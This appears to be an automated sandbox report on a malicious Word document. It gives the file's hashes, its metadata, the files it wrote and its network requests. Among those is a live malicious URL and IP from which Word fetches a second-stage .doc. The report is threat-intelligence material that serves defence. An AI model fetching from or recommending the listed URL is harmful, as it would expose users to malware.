File name: | 380028.docx |
Full analysis: | https://app.any.run/tasks/da3f881b-00e8-421b-a2e7-e411d72ee4ba |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 11:30:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | DF4170914F564DF9C10D68645796BFA6 |
SHA1: | 8361F2CA247008B50B41F65B0A9C03882339C60D |
SHA256: | 7DC92CEB5C56C18C2C645C4FD39E0D4D3C53A27355D5E6EEF38228F80342CC5D |
SSDEEP: | 192:R5C0EvCH76yMtWNKm0mqQTnhr5OwQT1Q3P55aTbFTB8GoA6akkWdmp:R5C5vCHmyMtiK4LOwQT1Q3DaNdQnmp |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
Creator: | Microsoft |
---|
ModifyDate: | 2017:09:24 17:27:00Z |
---|---|
CreateDate: | 2017:09:24 17:26:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | Microsoft |
AppVersion: | 14 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 7 |
LinksUpToDate: | No |
Company: | SPecialiST RePack |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 7 |
Words: | 1 |
Pages: | 1 |
TotalEditTime: | 1 minute |
Template: | dotm.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1422 |
ZipCompressedSize: | 358 |
ZipCRC: | 0x82872409 |
ZipModifyDate: | 2019:09:10 10:59:06 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0002 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3512 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\380028.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9E38.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{3EEF5842-FF54-4544-804D-C615DB5B1E56} | — | |
MD5:— | SHA256:— | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-4987-B391-992F501D9F7A} | — | |
MD5:— | SHA256:— | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | |
MD5:66F4CB4E409F7AA7BF084CB5486900B1 | SHA256:E5D88426BEF2489AD787F6781CC468A768449875BA1DCDC456A0F620494DF634 | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:E4D7CEE64D38347108E0FE7E923B9312 | SHA256:96DE4AA1084747A6B1C9A126CC874C5C0C9F98F9141D385481BEEFD0CADCEC5B | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | |
MD5:69824BDC5BDC5CD60EA1AEF0E3A787B4 | SHA256:B0BCC0FB1BEAAE3DC0243BBFD538418E2AC0866F472EA9617D6955A30C7E5A35 | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | |
MD5:D80A703296C4D19776ACB6B3D73C4516 | SHA256:AE7147E600D636E38167044136CE22A915BA379D974368176260652B19C2C23A | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB14BAFE-5382-4EC2-A782-D0F84E1E785A}.FSD | binary | |
MD5:C9EDCCDDA7EFADA758D6112364EBA680 | SHA256:6F7D4844618B45423A3B829CBE559C6EC103C5616A8446C79E4C36E72D1A7EF7 | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:62F2DA178DD59EBA6B61EE250E55F925 | SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244 | |||
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$380028.docx | pgc | |
MD5:800EE39A958F7A28C2565157727F20F9 | SHA256:3B64B5ACFB348867B814954F5E58E39D962947B020194B5B845E7C2DF681505C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3512 | WINWORD.EXE | HEAD | 404 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
3512 | WINWORD.EXE | GET | — | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
984 | svchost.exe | OPTIONS | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
3512 | WINWORD.EXE | OPTIONS | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
3512 | WINWORD.EXE | HEAD | 404 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 301 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network | US | html | 705 b | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 301 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1 | US | html | 705 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3512 | WINWORD.EXE | 23.227.137.210:80 | laveronicamagazine.com | 24 SHELLS | US | malicious |
984 | svchost.exe | 23.227.137.210:443 | laveronicamagazine.com | 24 SHELLS | US | malicious |
984 | svchost.exe | 23.227.137.210:80 | laveronicamagazine.com | 24 SHELLS | US | malicious |
Domain | IP | Reputation |
---|---|---|
laveronicamagazine.com |
| malicious |